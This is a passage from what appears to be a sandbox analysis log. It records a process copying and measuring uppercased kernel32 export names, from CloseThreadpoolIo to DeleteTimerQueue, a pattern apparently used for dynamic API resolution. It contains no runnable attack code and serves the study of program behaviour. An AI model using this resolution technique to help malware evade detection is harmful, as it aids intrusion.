returned="CloseThreadpoolIo" [0086.826] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.827] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.827] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.827] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.827] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.827] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.827] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.827] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.827] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.827] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.827] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.827] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.827] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.827] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.827] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.827] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.827] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.827] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.827] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.828] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.828] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.828] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.828] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.828] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.828] lstrlenA (lpString="COPYFILEA") returned 9 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.828] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.828] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.828] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.828] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.828] lstrlenA (lpString="COPYFILEW") returned 9 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.828] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.828] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.828] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.828] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.828] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.828] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.828] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.829] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.829] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.829] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.829] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.829] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.829] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.829] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.829] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.829] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.829] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.829] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.829] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.829] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.829] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.829] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.829] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.829] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.829] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.830] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.830] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.830] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.830] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.830] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.830] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.830] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.830] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.830] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.830] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.830] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.830] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.830] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.830] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.830] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.830] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.830] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.830] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.830] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.831] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.831] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.831] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.831] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.831] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.831] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.831] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.831] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.831] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.831] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.831] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.831] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.831] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.831] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.831] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.831] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.831] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.831] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.831] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.831] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.832] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.832] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.832] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.832] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.832] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.832] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.832] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.832] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.832] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.832] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.832] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.832] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.832] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.832] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.832] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.832] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.832] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.832] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.832] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.833] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.833] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.833] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.833] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.833] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.833] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.833] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.833] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.833] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.833] lstrlenA (lpString="DELETEATOM") returned 10 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.833] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.833] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.833] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.833] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.833] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.833] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.833] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.833] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.833] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.834] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.834] lstrcpyA (in: lpString1=0x3f2d1ec, 